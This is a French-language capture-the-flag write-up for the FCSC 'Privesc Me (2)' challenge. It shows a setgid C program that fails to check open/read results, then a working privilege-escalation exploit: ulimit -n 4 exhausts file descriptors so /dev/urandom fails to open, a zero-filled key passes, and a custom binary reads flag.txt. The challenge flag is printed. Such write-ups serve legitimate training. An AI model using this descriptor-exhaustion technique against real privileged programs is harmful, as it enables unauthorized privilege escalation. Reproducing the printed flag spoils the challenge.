# Privesc Me (2) - "ALED" - Your randomness checker

**Challenge**

Le dernier stagiaire de l'équipe nous a pondu un nouveau programme pour tester la robustesse des clés d'authentification que notre administrateur système utilise. Son outil est disponible dans le dossier stage1. Le chef a poussé un soupir d'agacement en voyant le code.

ssh -p7005 challenger@challenges1.france-cybersecurity-challenge.fr (mot de passe : challenger)

Note : cet environnement est partagé entre les 4 challenges Privesc Me.

**Solution**

Le code de stage1 est le suivant :

```c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#define BUF_SIZE 128

int main(int argc, char const *argv[]) {

    if(argc != 3){
        printf("Usage : %s <key file> <binary to execute>", argv[0]);
    }
    setresgid(getegid(), getegid(), getegid());
    
    int fd;
    unsigned char randomness[BUF_SIZE];
    unsigned char your_randomness[BUF_SIZE];
    memset(randomness, 0, BUF_SIZE);
    memset(your_randomness, 0, BUF_SIZE);

    int fd_key = open(argv[1], O_RDONLY, 0400);
    read(fd_key, your_randomness, BUF_SIZE);

	fd = open("/dev/urandom", O_RDONLY, 0400);
    int nb_bytes = read(fd, randomness, BUF_SIZE);
    for (int i = 0; i < nb_bytes; i++) {
        randomness[i] = (randomness[i] + 0x20) % 0x7F;
    }
    
    for(int i = 0; i < BUF_SIZE; i++){
        if(randomness[i] != your_randomness[i]) {
            puts("Meh, you failed");
            return EXIT_FAILURE;
        }
    }
    close(fd);
    puts("Ok, well done");
    char* arg[2] = {argv[2], NULL};
    execve(argv[2], arg, NULL);
    return 0;
}
```

Il s'agit de deviner le contenu de `/dev/urandom`... Il ne semble pas, à première vue, y avoir de vulnérabilité flagrante dans le code. La référence à `urandom` m'a troublé, j'avoue donc avoir recherché d'autres CTF sur le même sujet, et le write-up suivant m'a donné la technique à adopter : 
https://blog.scrt.ch/2015/03/24/insomnihack-finals-smtpwn-writeup/

En effet, on se retrouve dans une situation similaire :
- notre fichier clef est ouvert avant `/dev/urandom`.
- les codes retours de `open()` et `read()` ne sont pas vérifiés.

Ainsi, si on parvient à atteindre la valeur maximale de descripteurs de fichiers ouverts au moment de l'ouverture de urandom, celle-ci échouera. En conséquence, `read()` ne lira rien, et le tableau `randomness` restera rempli de zéros... valeur facile à deviner !

Et comment peut-on atteindre facilement la valeur maximale de descripteurs de fichiers ouverts ? Simplement en jouant sur la commande `ulimit` et de son paramètre `-n`. Le binaire va ouvrir les 3 descripteurs de fichiers classiques (`stdin`, `stdout`, `stderr`), puis notre fichier de clef, et enfin `/dev/urandom`. On positionnant une limite à 4, on bloque l'ouverture de ce dernier. Essayons : 

```shell
$ TMP=$(mktemp -d)
$ dd if=/dev/zero of=./plop count=128
$ ulimit -n 4
$ ~/stage1/stage1 plop /bin/bash plop
-bash: start_pipeline: pgrp pipe: Too many open files
Usage : /home/challenger/stage1/stage1 <key file> <binary to execute>Ok, well done
/bin/bash: error while loading shared libraries: libtinfo.so.6: cannot open shared object file: Error 24
```

Ça a marché... ou presque ! On a bien eu le message indiquant la concordance des clefs, malheureusement notre commande `bash` demande elle-même l'ouverture de plusieurs fichiers qui échoue.

On va donc plutôt choisir de lancer un binaire de notre crû, qui ne fera que lire le fichier `flag.txt`. Évidemment, la limite va toujours nous gêner, sauf qu'on peut remarquer dans le code d'origine que :
- le descripteur de notre fichier de clef n'est jamais fermé.
- la commande finale est lancée par `execve`, ce qui signifie que le process d'origine est écrasé par un nouveau, qui hérite des descripteurs de fichier. 

Ainsi, on peut faire en sorte de fermer le descripteur du fichier de clef dont on a hérité, ce qui libère juste ce qu'il faut pour ouvrir le flag. Voici le code de notre binaire `cmd.c` :

```c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#define BUF_SIZE 512

int main(int argc, char **argv) {
    unsigned char buffer[BUF_SIZE];
    memset(buffer, 0, BUF_SIZE);
    close(3);
    int fd = open("/home/challenger/stage1/flag.txt", O_RDONLY, 0400);
    int i = read(fd, buffer, BUF_SIZE);
    printf("Read %d : %s\n", i, buffer);
    return 0;
}
```

L'exploitation donne alors :

```shell
$ TMP=$(mktemp -d)
$ cd $TMP
$ vim cmd.c # On colle le code ci-dessus
$ gcc cmd.c -static -o cmd
$ dd if=/dev/zero of=./key count=128 bs=1
$ chmod 755 $TMP
$ ulimit -n 4
$ ~/stage1/stage1 $TMP/key $TMP/cmd
-bash: start_pipeline: pgrp pipe: Too many open files
Ok, well done
Read 70 : FCSC{6bd1152e8dcefc368b08a3e82241bc83ea7a613a3322c6a2d818d408e1fb4d60}
```
